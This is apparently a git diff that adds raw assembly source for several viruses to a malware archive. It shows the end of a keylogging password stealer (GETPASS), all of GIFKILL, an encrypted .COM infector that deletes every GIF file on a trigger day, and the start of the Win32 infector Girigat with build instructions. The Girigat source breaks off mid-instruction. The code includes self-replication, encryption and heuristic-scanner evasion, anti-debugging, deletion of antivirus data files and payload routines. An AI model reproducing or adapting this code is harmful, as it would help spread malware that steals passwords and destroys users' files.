PTR[CS:0100+KFLAG],00h; + MOV WORD PTR[CS:0100+KPTR],00h; + JMP RESREGS ;Restore registers. +WFILE: PUSH AX ;\ + PUSH BX ; + PUSH DX ; Save registers. + PUSH CX ; + PUSH DS ;/ + PUSH CS ;\ Get Data segment on address. + POP DS ;/ + MOV AX,3D02h ;Open file function. + MOV DX,OFFSET[CS:0100+FN] ;Offset file spec. + INT 21h ;Call DOS. + JC FAILURE ;On error, quit. + XCHG BX,AX ;Into BX. + MOV AX,4202h ;Mov file handle to EOF. + XOR CX,CX ;CX=0 + XOR DX,DX ;DX=0 + INT 21h ;Call DOS. + CMP AX,2000h ;File on max lenght? + JGE FAILURE ;If so, exit. +WRITE: MOV CX,CS:[0100+KPTR] ;BX = keyboard pointer. + ADD CX,03h ;+3. + MOV DX,OFFSET CS:[0100+KBUFF];Offset keyboard buffer. + MOV AH,40h ;Write to file function. + INT 21h ;Call DOS. +FCLOSE: MOV AH,3Eh ;Close file funtion. + INT 21h ;Call DOS. +FAILURE:POP DS ;\ + POP DX ; + POP CX ; Restore registers. + POP BX ; + POP AX ;/ + RET ;Return to caller. +;----------------------------------------------------------------------------- +NINT21: DW 0 ;- Original INT 21 vector. + DW 0 ;/ +NINT16: DW 0 ;- Original INT 16 vector. + DW 0 ;/ +KEYBUFF DB 1dh DUP (?) ;Keyboard buffer. +LASTBYT:DB 0 ;Last Resident Byte. +;----------------------------------------------------------------------------- +ATTRIB: MOV DX,WORD PTR[BP+OFFSET NP];Offset in DTA. + MOV AX,4300h ;Ask file attributes. + INT 21h ;Call DOS. + LEA BX,[BP+OFFSET ATTR] ;Save address for old attributes. + MOV [BX],CX ;Save it. + XOR CX,CX ;Clear file attributes. + MOV AX,4301h ;Write file attributes. + INT 21h ;Call DOS. + JNC OK ;No error, proceed. + CALL EXIT ;Oh Oh, error occured. Quit. +OK: RET ;Return to caller. +;----------------------------------------------------------------------------- +RATTRIB:LEA DX,[BP+OFFSET NEWNAM] ;Offset file specification.(name.TXT) + LEA BX,[BP+OFFSET ATTR] ;Offset address old attributes. + MOV CX,[BX] ;Into CX. + MOV AX,4301h ;Write old values back. + INT 21h ;Call DOS. + RET ;Return to caller. +;----------------------------------------------------------------------------- +GODIR: LEA DX,[BP+OFFSET NEW_DTA+52];Offset directory spec. + MOV AH,3Bh ;Goto the directory. + INT 21h ;Call DOS. + RET ;Return to caller. +;----------------------------------------------------------------------------- +RANDOM: CALL CHKTIME ;Get system time. + MOV CX,0 ;Figure this out by yourself. + MOV AX,100d ;It is a random generator with +OK_19: INC CX ;two variable inputs. + SUB AX,BX ;A: How many dir's in the path. + CMP AX,01d ;B: Random system time. (jiffies) + JGE OK_19 ;With this values, we create a + XOR BX,BX ;random value between 1 and A. +OK_20: INC BX ; + SUB DL,CL ; + CMP DL,01d ; + JGE OK_20 ; + MOV BYTE PTR[BP+OFFSET VAL_2],BL;Save value. + RET ;Return to caller. +;----------------------------------------------------------------------------- +BEGIN1: PUSH SP ; + POP BX ;Everything is related to BP. + MOV BP,WORD PTR[BX] ; + SUB BP,10Fh ;In first run BP=0 + RET ; +;----------------------------------------------------------------------------- +NEWINT: MOV AL,03h ;New INT 24. + IRET ;No more write protect errors! +;----------------------------------------------------------------------------- +TIMER: PUSH DS ;Save data segment. + MOV AX,0044h ;\ + MOV DS,AX ;- DS=resident segment. + CMP BYTE PTR[DS:0100],01h ;Already printed the file? + POP DS ;Restore data segment. + JE NOPRINT ;Yes, once is enough. + MOV AH,2Ah ;Get system date. + INT 21h ;Call DOS. + CMP DL,01h ;Is it the 1st of the month? + JNE NOPRINT ;Nope, don't print the passwords. + MOV AX,3D01h ;Open device PRN (printer) + LEA DX,[BP+OFFSET PRINT] ;Offset spec. + INT 21h ;Call DOS. + MOV DI,AX ;Save handle. + MOV AX,3D00h ;Open Password file. + LEA DX,[BP+OFFSET FNAME] ;File spec. + INT 21h ;Call DOS. + MOV SI,AX ;Save handle. +GOPRINT:MOV AH,3Fh ;Read file function. + MOV BX,SI ;File handle into BX. + MOV CX,01h ;Read one byte. + LEA DX,[BP+OFFSET OUTPUT] ;Into this address. + INT 21h ;Call DOS. + CMP AL,0 ;EOF? + JE READY ;If equal, ready. + MOV AH,40h ;Write to file function. + MOV BX,DI ;File handle into BX. + MOV CX,01h ;Write one byte. + LEA DX,[BP+OFFSET OUTPUT] ;Offset output. + INT 21h ;Call DOS. + JMP GOPRINT ;Next byte. +READY: MOV AH,3Eh ;Close file. + INT 21h ;Call DOS. + PUSH DS ; + MOV AX,0044h ; + mov DS,AX ;Restore data segment. + MOV BYTE PTR[DS:0100],01h ;Already printed the file? + POP DS ; +NOPRINT:RET ;Return to caller. +;----------------------------------------------------------------------------- +INSTSR2:LEA DI,[BP+OFFSET NEW_DTA+0100h];/ + LEA SI,[BP+OFFSET INFECT] ;Offset address infection routine. + MOV CX,TSR2LEN ;Length to install. + REP MOVSB ;Install it. + MOV AX,25D0h ;Give up new INT D0 vector. + LEA DX,[BP+OFFSET NEW_DTA+0100h]; + INT 21h ;Call DOS. + RET ;Return to caller. +;----------------------------------------------------------------------------- +PRINT DB 'PRN',0 ;Device=printer. +PATH DB 'PATH=' ;Used to find environment. +SPEC DB '*.COM',0 ;File search specification. +TXT DB '.TXT',0 ;Rename file specification. +OUTPUT DB 0 ;Output byte to printer. +TXTPOI DW 0 ;Pointer in specification. +MARK1 DB 0 ;Used for infection check. +VAL_2 DB 0 ;Random value for directory switching. +OLDRV DB 0 ;Old drive code. +BYTES DB 'TBDRVX',0 ; +COMMND DB 'COMM',0 ; +MICRO DB 'CHKLIST.MS',0 ;- Files to be deleted. +CENTRAL DB 'CHKLIST.CPS',0 ;/ +TBAV DB 'ANTI-VIR.DAT',0 ;/ +VIRNAME DB 'GETPASS! V3.X',0 ; +BEGIN2 DW 0 ; +NWJMP1 DB 0EBh,0 ; +FLAGT DB 0 ; +OLD_DTA DW 0 ;Old DTA addres. +HANDLE DW 0 ;File handle. +TIME DB 2 DUP (?) ;File time. +DATE DB 2 DUP (?) ;File date. +ATTR DB 1 DUP (?),0 ;Attributes. +NEWJMP DB 0E9h,0,0 ;Jump replacement. +ORIGNL DB 0CDh,020h,090h ;Original instrucitons. +DEXIT DB 0CDh,020h,090h ;Dummy exit instructions. +NEWNAM DB 0Dh DUP (?) ;New file name. +OLDINT DW 0 ;Old INT 24 vector. +NP DW ? ;New DTA address. +;----------------------------------------------------------------------------- +INFECT: PUSH BX ;Save file handle. + PUSH DX ;Save encryption key. + PUSH BX ;Save file handle. + CALL ENCRYPT ;Encrypt the virus code. + POP BX ;Restore file handle. + LEA DX,[BP+OFFSET VSTART] ;Begin here. + MOV CX,VIRLEN ;Write this many Bytes. + MOV AH,40h ;Write to file. + INT 21h ;Call DOS. + POP DX ;Restore encryption value. + CALL ENCRYPT ;Fix up the mess. + POP BX ;Restore file handle. +DUMMY: IRET ;Return to caller. +;----------------------------------------------------------------------------- +CREATE: MOV AH,5Bh ;Create file function. + LEA DX,[BP+OFFSET FNAME] ;Offset file spec. + MOV CX,0 ;Normal attributes. + INT 21h ;Call DOS. + JC EXISTS ;File already excists, do the rest. + XCHG AX,BX ;File handle into BX. + MOV CX,INTRO ;Lenght of intro. + LEA DX,[BP+OFFSET INAME] ;Offset text. + MOV AH,40h ;Write to file function. + INT 21h ;Call DOS. +EXISTS: RET ;Return to caller. +INAME: DB 'You are now looking at the name/passwords of ' + DB 'your network! ',CR,LF + DB 'Greetings, ThE wEiRd GeNiUs.',CR,LF + DB 'Check your MSD.INI once in a while!',CR,LF,CR,LF +LBIT: DB 0 +;----------------------------------------------------------------------------- +;Comment: From here the code remains UN-encrypted. +;----------------------------------------------------------------------------- +CHKTIME:MOV AH,2Ch ;Get system time. + INT 21h ;Call DOS. + CMP DL,0 ;If zero, + JE CHKTIME ;try again. + RET ;Return to caller. +;----------------------------------------------------------------------------- +CHKDOS: MOV AH,30h ;Get DOS version. + INT 21h ;Call DOS. + RET ;Return to caller. +;----------------------------------------------------------------------------- +VAL_1 DB 00h ;Encryption Value. +;----------------------------------------------------------------------------- +;Encrypting the virus code is not longer the most important thing to do since +;some of the anti-viral software can decrypt and trace the virus code in a +;simulated way. The en/de-cryption routine is almost the only piece of +;code that stays readable and if it is not a polymorphic virus this code +;always stays the same. The only way we can misguide a heuristic +;scanner is to 'tell' it that we are a normal, respectable program. By first +;performing a set of 'normal' instructions we mislead the scanner until it +;stops tracing the program. The result is that the en/decryption routine is +;not discovered. Since there are no other suspicious instructions in the code +;we remain under cover. This is why I used a very simple encryption method. +;----------------------------------------------------------------------------- +ENCRYP: CALL NEXTL ;-Get BP on address. +NEXTL: POP BX ;/ + SUB BX,04 ;[BX]=decryption key. + MOV DL,[BX] ;DL=[BX] + SUB BX,LENGTH ;BX=begin of encrypted code. + CMP DL,0 ;Code Encrypted? + JE NOTENC ;Nope + JMP DECRYPT ;Decrypt. +ENCRYPT:LEA BX,[BP+OFFSET CSTART] ;De/en-crypt from here. +DECRYPT:MOV DH,DL ; + MOV CX,CRYPTLEN ;Set counter. +X_LOOP: XOR [BX],DL ;Xor the code on address BX. + SUB DL,DH ;-To change form of scrambled code. + SUB DH,02Eh ;/ + INC BX ;Increase address. + LOOP X_LOOP ;Repeat until done. +NOTENC: RET ;Return to caller. +;----------------------------------------------------------------------------- +BUFFER: DB 64 DUP (?) ;Here we store directory info. +;----------------------------------------------------------------------------- +NEW_DTA: ;Here we put the DTA copy. +;----------------------------------------------------------------------------- +CODE ENDS +END START +;============================================================================= diff --git a/MSDOS/Virus.MSDOS.Unknown.gifkill.asm b/MSDOS/Virus.MSDOS.Unknown.gifkill.asm new file mode 100644 index 00000000..1fbb1b84 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.gifkill.asm @@ -0,0 +1,392 @@ +; GIFKILL.ASM -- Seek and Destroy GIF +; Written by Dark Avenger + +virus_type equ 0 ; Appending Virus +is_encrypted equ 1 ; We're encrypted +tsr_virus equ 0 ; We're not TSR + +code segment byte public + assume cs:code,ds:code,es:code,ss:code + org 0100h + +main proc near + db 0E9h,00h,00h ; Near jump (for compatibility) +start: call find_offset ; Like a PUSH IP +find_offset: pop bp ; BP holds old IP + sub bp,offset find_offset ; Adjust for length of host + + call encrypt_decrypt ; Decrypt the virus + +start_of_code label near + + lea si,[bp + buffer] ; SI points to original start + mov di,0100h ; Push 0100h on to stack for + push di ; return to main program + movsw ; Copy the first two bytes + movsb ; Copy the third byte + + mov di,bp ; DI points to start of virus + + mov bp,sp ; BP points to stack + sub sp,128 ; Allocate 128 bytes on stack + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address on stack + + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer on stack + int 021h + +stop_tracing: mov cx,09EBh + mov ax,0FE05h ; Acutal move, plus a HaLT + jmp $-2 + add ah,03Bh ; AH now equals 025h + jmp $-10 ; Execute the HaLT + lea bx,[di + null_vector] ; BX points to new routine + push cs ; Transfer CS into ES + pop es ; using a PUSH/POP + int 021h + mov al,1 ; Disable interrupt 1, too + int 021h + jmp short skip_null ; Hop over the loop +null_vector: jmp $ ; An infinite loop +skip_null: mov byte ptr [di + lock_keys + 1],130 ; Prefetch unchanged +lock_keys: mov al,128 ; Change here screws DEBUG + out 021h,al ; If tracing then lock keyboard + + mov cx,0003h ; Do 3 infections +search_loop: push cx ; Save CX + call search_files ; Find and infect a file + pop cx ; Restore CX + loop search_loop ; Repeat until CX is 0 + + call get_weekday + cmp ax,0005h ; Did the function return 5? + je strt00 ; If equal, do effect + jmp end00 ; Otherwise skip over it +strt00: lea dx,[di + data00] ; DX points to data + mov ah,04Eh ; DOS find first file function + mov cx,00100111b ; All file attributes valid + int 021h + jc erase_done ; Exit procedure on failure + mov ah,02Fh ; DOS get DTA function + int 021h + lea dx,[bx + 01Eh] ; DX points to filename in DTA +erase_loop: mov ah,041h ; DOS delete file function + int 021h + mov ah,03Ch ; DOS create file function + xor cx,cx ; No attributes for new file + int 021h + mov ah,041h ; DOS delete file function + int 021h + mov ah,04Fh ; DOS find next file function + int 021h + jnc erase_loop ; Repeat until no files left +erase_done: + +end00: +com_end: pop dx ; DX holds original DTA address + mov ah,01Ah ; DOS set DTA function + int 021h + + mov sp,bp ; Deallocate local buffer + + xor ax,ax ; + mov bx,ax ; + mov cx,ax ; + mov dx,ax ; Empty out the registers + mov si,ax ; + mov di,ax ; + mov bp,ax ; + + ret ; Return to original program +main endp + + + db 0FAh,045h,02Eh,0B3h,024h + +search_files proc near + push bp ; Save BP + mov bp,sp ; BP points to local buffer + sub sp,64 ; Allocate 64 bytes on stack + + mov ah,047h ; DOS get current dir function + xor dl,dl ; DL holds drive # (current) + lea si,[bp - 64] ; SI points to 64-byte buffer + int 021h + + mov ah,03Bh ; DOS change directory function + lea dx,[di + root] ; DX points to root directory + int 021h + + call traverse ; Start the traversal + + mov ah,03Bh ; DOS change directory function + lea dx,[bp - 64] ; DX points to old directory + int 021h + + mov sp,bp ; Restore old stack pointer + pop bp ; Restore BP + ret ; Return to caller + +root db "\",0 ; Root directory +search_files endp + +traverse proc near + push bp ; Save BP + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address + + mov bp,sp ; BP points to local buffer + sub sp,128 ; Allocate 128 bytes on stack + + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer + int 021h + + mov ah,04Eh ; DOS find first function + mov cx,00010000b ; CX holds search attributes + lea dx,[di + all_files] ; DX points to "*.*" + int 021h + jc leave_traverse ; Leave if no files present + +check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory? + jne another_dir ; If not, try again + cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."? + je another_dir ;If so, keep going + + mov ah,03Bh ; DOS change directory function + lea dx,[bp - 98] ; DX points to new directory + int 021h + + call traverse ; Recursively call ourself + + pushf ; Save the flags + mov ah,03Bh ; DOS change directory function + lea dx,[di + up_dir] ; DX points to parent directory + int 021h + popf ; Restore the flags + + jnc done_searching ; If we infected then exit + +another_dir: mov ah,04Fh ; DOS find next function + int 021h + jnc check_dir ; If found check the file + +leave_traverse: + lea dx,[di + com_mask] ; DX points to "*.COM" + call find_files ; Try to infect a file +done_searching: mov sp,bp ; Restore old stack frame + mov ah,01Ah ; DOS set DTA function + pop dx ; Retrieve old DTA address + int 021h + + pop bp ; Restore BP + ret ; Return to caller + +up_dir db "..",0 ; Parent directory name +all_files db "*.*",0 ; Directories to search for +com_mask db "*.COM",0 ; Mask for all .COM files +traverse endp + + db 0A6h,03Ch,0B6h,078h,0CCh + + +find_files proc near + push bp ; Save BP + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address + + mov bp,sp ; BP points to local buffer + sub sp,128 ; Allocate 128 bytes on stack + + push dx ; Save file mask + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer + int 021h + + mov ah,04Eh ; DOS find first file function + mov cx,00100111b ; CX holds all file attributes + pop dx ; Restore file mask +find_a_file: int 021h + jc done_finding ; Exit if no files found + call infect_file ; Infect the file! + jnc done_finding ; Exit if no error + mov ah,04Fh ; DOS find next file function + jmp short find_a_file ; Try finding another file + +done_finding: mov sp,bp ; Restore old stack frame + mov ah,01Ah ; DOS set DTA function + pop dx ; Retrieve old DTA address + int 021h + + pop bp ; Restore BP + ret ; Return to caller +find_files endp + + db 002h,0EFh,034h,048h,091h + +infect_file proc near + mov ah,02Fh ; DOS get DTA address function + int 021h + mov si,bx ; SI points to the DTA + + mov byte ptr [di + set_carry],0 ; Assume we'll fail + + cmp word ptr [si + 01Ah],(65279 - (finish - start)) + jbe size_ok ; If it's small enough continue + jmp infection_done ; Otherwise exit + +size_ok: mov ax,03D00h ; DOS open file function, r/o + lea dx,[si + 01Eh] ; DX points to file name + int 021h + xchg bx,ax ; BX holds file handle + + mov ah,03Fh ; DOS read from file function + mov cx,3 ; CX holds bytes to read (3) + lea dx,[di + buffer] ; DX points to buffer + int 021h + + mov ax,04202h ; DOS file seek function, EOF + cwd ; Zero DX _ Zero bytes from end + mov cx,dx ; Zero CX / + int 021h + + xchg dx,ax ; Faster than a PUSH AX + mov ah,03Eh ; DOS close file function + int 021h + xchg dx,ax ; Faster than a POP AX + + sub ax,finish - start + 3 ; Adjust AX for a valid jump + cmp word ptr [di + buffer + 1],ax ; Is there a JMP yet? + je infection_done ; If equal then exit + mov byte ptr [di + set_carry],1 ; Success -- the file is OK + add ax,finish - start ; Re-adjust to make the jump + mov word ptr [di + new_jump + 1],ax ; Construct jump + + mov ax,04301h ; DOS set file attrib. function + xor cx,cx ; Clear all attributes + lea dx,[si + 01Eh] ; DX points to victim's name + int 021h + + mov ax,03D02h ; DOS open file function, r/w + int 021h + xchg bx,ax ; BX holds file handle + + mov ah,040h ; DOS write to file function + mov cx,3 ; CX holds bytes to write (3) + lea dx,[di + new_jump] ; DX points to the jump we made + int 021h + + mov ax,04202h ; DOS file seek function, EOF + cwd ; Zero DX _ Zero bytes from end + mov cx,dx ; Zero CX / + int 021h + + push si ; Save SI through call + call encrypt_code ; Write an encrypted copy + pop si ; Restore SI + + mov ax,05701h ; DOS set file time function + mov cx,[si + 016h] ; CX holds old file time + mov dx,[si + 018h] ; DX holds old file date + int 021h + + mov ah,03Eh ; DOS close file function + int 021h + + mov ax,04301h ; DOS set file attrib. function + xor ch,ch ; Clear CH for file attribute + mov cl,[si + 015h] ; CX holds file's old attributes + lea dx,[si + 01Eh] ; DX points to victim's name + int 021h + +infection_done: cmp byte ptr [di + set_carry],1 ; Set carry flag if failed + ret ; Return to caller + +set_carry db ? ; Set-carry-on-exit flag +buffer db 090h,0CDh,020h ; Buffer to hold old three bytes +new_jump db 0E9h,?,? ; New jump to virus +infect_file endp + + + db 089h,043h,03Bh,054h,0AAh + +get_weekday proc near + mov ah,02Ah ; DOS get date function + int 021h + cbw ; Sign-extend AL into AX + ret ; Return to caller +get_weekday endp + +data00 db "*.GIF",0 + +vcl_marker db "[Z10]",0 ; VCL creation marker + + +note db "Bye Bye Mr.GIF",0 + db "You'll never find all the file" + db "s I have infected!",0 + +encrypt_code proc near + push bp ; Save BP + mov bp,di ; Use BP as pointer to code + lea si,[bp + encrypt_decrypt]; SI points to cipher routine + + xor ah,ah ; BIOS get time function + int 01Ah + mov word ptr [si + 9],dx ; Low word of timer is new key + + xor byte ptr [si + 1],8 ; + xor byte ptr [si + 8],1 ; Change all SIs to DIs + xor word ptr [si + 11],0101h; (and vice-versa) + + lea di,[bp + finish] ; Copy routine into heap + mov cx,finish - encrypt_decrypt - 1 ; All but final RET + push si ; Save SI for later + push cx ; Save CX for later + rep movsb ; Copy the bytes + + lea si,[bp + write_stuff] ; SI points to write stuff + mov cx,5 ; CX holds length of write + rep movsb ; Copy the bytes + + pop cx ; Restore CX + pop si ; Restore SI + inc cx ; Copy the RET also this time + rep movsb ; Copy the routine again + + mov ah,040h ; DOS write to file function + lea dx,[bp + start] ; DX points to virus + + lea si,[bp + finish] ; SI points to routine + call si ; Encrypt/write/decrypt + + mov di,bp ; DI points to virus again + pop bp ; Restore BP + ret ; Return to caller + +write_stuff: mov cx,finish - start ; Length of code + int 021h +encrypt_code endp + +end_of_code label near + +encrypt_decrypt proc near + lea si,[bp + start_of_code] ; SI points to code to decrypt + mov cx,(end_of_code - start_of_code) / 2 ; CX holds length +xor_loop: db 081h,034h,00h,00h ; XOR a word by the key + inc si ; Do the next word + inc si ; + loop xor_loop ; Loop until we're through + ret ; Return to caller +encrypt_decrypt endp +finish label near + +code ends + end main diff --git a/MSDOS/Virus.MSDOS.Unknown.girigat.asm b/MSDOS/Virus.MSDOS.Unknown.girigat.asm new file mode 100644 index 00000000..7260f5cd --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.girigat.asm @@ -0,0 +1,1450 @@ +; +; +; +; +; +; +; +; by Mister Sandman +; +; Ĵ Introduction +; +; This new creation of mine has turned to be my first "pure" Win32 virus, +; as well as one of which i'm really proud of. After an absence of months +; in which i haven't coded absolutely anything because of certain reasons +; i won't explain here, i see Girigat as a new start in my VX career. +; +; My style has changed, and i am not referring to the fact that of course +; Win32 viruses have nothing to do with DOS viruses. I am sure these dif- +; ferences i'm writing about are relevant enough so that i do not have to +; explain them all here... it is all about the point of view computer vi- +; ruses are interpreted by every virus writer. In my own case my point of +; view changed in the last months, and here is the result... which i hope +; to be the first of a long series of viruses i pretend to write. With no +; schedules, with no goals, with no pressure. Just my way, trying to show +; by means of my code who the real Mister Sandman is. +; +; Ĵ Behavior +; +; Girigat is a 4937 bytes long Win32 virus. It changes its behavior auto- +; matically whenever it jumps to a new computer, so describing the way it +; works would not be a too reliable source of information. Hence, it is a +; good idea to explain what it may become, rather than what it is at this +; moment, in the current compiled version. Girigat may turn either into a +; per-process resident virus, or into a runtime one, or even into a mixed +; version which would infect by means of both runtime and resident infec- +; tion routines. Also, it may infect CPL, EXE or SCR files, including all +; the possible combinations, among these three file formats. Last but not +; least, its runtime routines may infect either in the current directory, +; or in the Windows folder, or in both at once. +; +; Hooked API functions are CreateFile, FindFirstFile and FindNextFile, in +; both their ANSI and Unicode versions. Whenever an infected file is exe- +; cuted three months after the day in which it got infected there will be +; a 50% probability, of getting one of the four virus payloads triggered. +; The first of them drops a BMP file with the virus logo and then sets it +; as the new system wallpaper, on a black background, after the next sys- +; tem reboot. The second possible payload gets the Windows cursor jumping +; all over the screen, moving to a random position every half second more +; or less. The third payload displays by means of a shell message box the +; system information, including the copyright strings of Girigat, as well +; as including an alert icon instead of the original Windows logo. Final- +; ly, the fourth virus payload consists on producing a Poltergesitish ef- +; fect, which will keep on opening and closing the CD tray all the time. +; +; Ĵ What does "Girigat" mean? +; +; The virus name, is the result of the latin transliteration of the hindi +; word used to refer to a chameleon. I decided to call it this way becau- +; se of the routine it uses to change its own behavior, and because of my +; admiration to India, which is with no doubt one of the most interesting +; countries all over the world. The BMP logo Girigat drops, in one of its +; four payloads, is an image of the way the virus name looks like written +; in the devanagari alphabet (the official one for the hindi language). +; +; Besides of the above reasons, i should add that, chameleons have a very +; special meaning in my life. Albeit nowadays i have only one chameleon i +; have had four specimens at the same time in the past years. Also, in my +; right arm there's a big chameleon tattooed in the tribal style together +; with more tribal designs, which is more or less significative, in which +; concerns to the relevance of these reptiles to me. +; +; Ĵ Greetings +; +; I would like to dedicate this virus to my girlfriend Miss Sandwoman, as +; it is the less i could do for her in order to compensate everything she +; has done for me, especially in which concerns to this virus since she's +; always been encouraging and pulling me to finish it. I'd like to greet, +; as well, my friend Shaitan, since he's from India. Hope he'll like this +; virus, with which he will surely get identified. +; +; Ĵ Compiling instructions +; +; tasm32 -ml -m5 -q -zn Girigat.asm +; tlink32 -Tpe -aa -c -x Girigat.obj,Girigat.exe,,Import32.lib +; pewrsec Girigat.exe + + + .386p + .model flat + +; Ĵ Imported API functions + + extrn GetModuleHandleA:NEAR + extrn MessageBoxA:NEAR + extrn ExitProcess:NEAR + +; ͹ Virus setup routines + + .code +global_start label byte + +file_entry: call delta_offset +delta_offset: pop ebp + mov ebx,ebp + sub ebp,offset delta_offset + + db 81h,0ebh +base_address dd global_start-base_default+5 + + db 0b8h +rva_entry dd host_code-base_default + + add eax,ebx + push eax + + mov ecx,11h + lea eax,dword ptr [ebp+sz_gmhandlea] + call get_it_api + + cmp eax,0ffffffffh + je try_unicode + + lea edx,dword ptr [ebp+sz_kernel32] + mov dword ptr [ebp+ad_gmhandlea],eax + jmp getk32handle + +try_unicode: mov ecx,11h + lea eax,dword ptr [ebp+sz_gmhandlew] + call get_it_api + + cmp eax,0ffffffffh + je back_to_host + + lea edx,dword ptr [ebp+sz_kernel32] +getk32handle: push edx + call eax + + mov ecx,0eh + mov dword ptr [ebp+ad_kernel32],eax + lea eax,dword ptr [ebp+sz_gpaddress] + call get_et_api + + cmp eax,0ffffffffh + je back_to_host + + cld + mov dword ptr [ebp+ad_gpaddress],eax + mov ecx,(offset @sz_apis_end-offset @sz_apis_start)/4 + lea esi,dword ptr [ebp+@sz_apis_start] + lea edi,dword ptr [ebp+ad_apis_start] + +setup_apis: lodsd + add eax,ebp + push ecx esi edi eax + push dword ptr [ebp+ad_kernel32] + call dword ptr [ebp+ad_gpaddress] + + pop edi esi ecx + or eax,eax + jz back_to_host + + cld + stosd + loop setup_apis + +; Ĵ Computer name check + + lea eax,dword ptr [ebp+buffer_size] + lea esi,dword ptr [ebp+dir_buffer] + lea edi,dword ptr [ebp+sz_comp_name] + push esi edi eax esi + call dword ptr [ebp+ad_gcompname] + +check_machine: lodsb + or al,al + jz check_payload + + scasb + je check_machine + + pop edi esi + push esi edi + add esi,9 + mov byte ptr [esi],0 + + call dword ptr [ebp+ad_lstrcpy] + call chromatos + jmp compare_date + +; Ĵ Activation day check + +check_payload: pop edi esi +compare_date: mov dword ptr [ebp+buffer_size],102h + lea eax,dword ptr [ebp+current_time] + push eax + call dword ptr [ebp+ad_getsystime] + + mov ax,word ptr [ebp+birth_day] + cmp ax,word ptr [ebp+current_day] + jne viral_work + + mov ax,3 + add ax,word ptr [ebp+birth_month] + cmp ax,0ch + jbe my_birthday? + + sub ax,0ch +my_birthday?: cmp ax,word ptr [ebp+current_month] + jne viral_work + +; Ĵ Payload API setup + + lea eax,dword ptr [ebp+sz_user32] + push eax + call dword ptr [ebp+ad_loadlibrary] + or eax,eax + jz viral_work + + mov esi,eax + lea edx,dword ptr [ebp+sz_setcurpos] + push edx eax + call dword ptr [ebp+ad_gpaddress] + or eax,eax + jz viral_work + + mov dword ptr [ebp+ad_setcurpos],eax + lea edx,dword ptr [ebp+sz_loadicon] + push edx esi + call dword ptr [ebp+ad_gpaddress] + or eax,eax + jz viral_work + + mov dword ptr [ebp+ad_loadicon],eax + lea eax,dword ptr [ebp+sz_winmm] + push eax + call dword ptr [ebp+ad_loadlibrary] + or eax,eax + jz viral_work + + lea edx,dword ptr [ebp+sz_mcisendstr] + push edx eax + call dword ptr [ebp+ad_gpaddress] + or eax,eax + jz viral_work + + mov dword ptr [ebp+ad_mcisendstr],eax + lea eax,dword ptr [ebp+sz_shell32] + push eax + call dword ptr [ebp+ad_loadlibrary] + or eax,eax + jz viral_work + + lea edx,dword ptr [ebp+sz_shellabout] + push edx eax + call dword ptr [ebp+ad_gpaddress] + or eax,eax + jz viral_work + + mov dword ptr [ebp+ad_shellabout],eax + lea eax,dword ptr [ebp+sz_advapi32] + push eax + call dword ptr [ebp+ad_loadlibrary] + or eax,eax + jz viral_work + + mov esi,eax + lea edx,dword ptr [ebp+sz_regopenkey] + push edx eax + call dword ptr [ebp+ad_gpaddress] + or eax,eax + jz viral_work + + mov dword ptr [ebp+ad_regopenkey],eax + lea edx,dword ptr [ebp+sz_regsetvalue] + push edx esi + call dword ptr [ebp+ad_gpaddress] + or eax,eax + jz viral_work + + mov dword ptr [ebp+ad_regsetvalue],eax + +; Ĵ Payload election + + mov eax,1 + call pseudorandom + or eax,eax + jnz viral_work + + mov eax,((offset @payloads_end-offset @payloads_start)/4)-1 + lea esi,dword ptr [ebp+@payloads_start] + call pseudorandom + + mov ecx,4 + mul ecx + add esi,eax + + lodsd + add eax,ebp + call eax + +; Ĵ Start of real virus activity + +viral_work: cmp byte ptr [ebp+flag_hooking],OFF + je only_runtime + + call apihook_cepa + cmp byte ptr [ebp+flag_runtime],OFF + je back_to_host + +only_runtime: call runtime_cepa +back_to_host: ret + +; ͹ Direct action routines + +runtime_cepa: cmp byte ptr [ebp+flag_curdir],OFF + je go_for_windir + + lea eax,dword ptr [ebp+dir_buffer] + push eax 104h + call dword ptr [ebp+ad_getcurdir] + or eax,eax + jz go_for_windir + call look_for_food + +go_for_windir: cmp byte ptr [ebp+flag_windir],OFF + je runtime_done + + lea eax,dword ptr [ebp+dir_buffer] + push 104h eax + call dword ptr [ebp+ad_getwindir] + or eax,eax + jz runtime_done + call look_for_food + +; Ĵ Appropriate victim search routine + +look_for_food: cmp eax,4 + jb runtime_done + + mov edx,eax + lea esi,dword ptr [ebp+sz_wildcard] + call add_wildcard + + lea eax,dword ptr [ebp+win32_finddata] + lea edx,dword ptr [ebp+dir_buffer] + push eax edx + call dword ptr [ebp+ad_findfirst] + + cmp eax,0ffffffffh + je runtime_done + + mov dword ptr [ebp+handle_search],eax +check_victim: cmp dword ptr [ebp+win32_finddata+1ch],0 + jne find_next + + mov eax,dword ptr [ebp+win32_finddata+20h] + cmp eax,0ffffffffh-(size_in_file+1000h) + jae find_next + + cld + lea esi,dword ptr [ebp+dir_buffer] + mov edx,esi + +skip_slashes: lodsb + cmp al,'\' + jne check_asciiz + + mov edx,esi +check_asciiz: or al,al + jne skip_slashes + + lea esi,dword ptr [ebp+win32_finddata+2ch] + mov edi,edx + +process_name: lodsb + cmp al,'a' + jb copy_filename + + sub al,('a'-'A') +copy_filename: stosb + or al,al + jnz process_name + + mov eax,dword ptr [edi-5] + lea edx,dword ptr [ebp+dir_buffer] + call manage_file + +find_next: lea eax,dword ptr [ebp+win32_finddata] + push eax dword ptr [ebp+handle_search] + call dword ptr [ebp+ad_findnext] + or eax,eax + jnz check_victim + + push dword ptr [ebp+handle_search] + call dword ptr [ebp+ad_findclose] +runtime_done: ret + +; Ĵ Infection setup routine + +setup_file: cld + cmp word ptr [ebx],'ZM' + jne bad_setup + + cmp word ptr [ebx+12h],');' + je bad_setup + + mov esi,ebx + add esi,dword ptr [ebx+3ch] + mov word ptr [ebx+12h],');' + + lodsd + cmp eax,'EP' + jne bad_setup + + mov ax,word ptr [esi+12h] + test ax,2 + jz bad_setup + + test ax,2000h + jnz bad_setup + + push word ptr [ebp+current_day] + pop word ptr [ebp+birth_day] + push word ptr 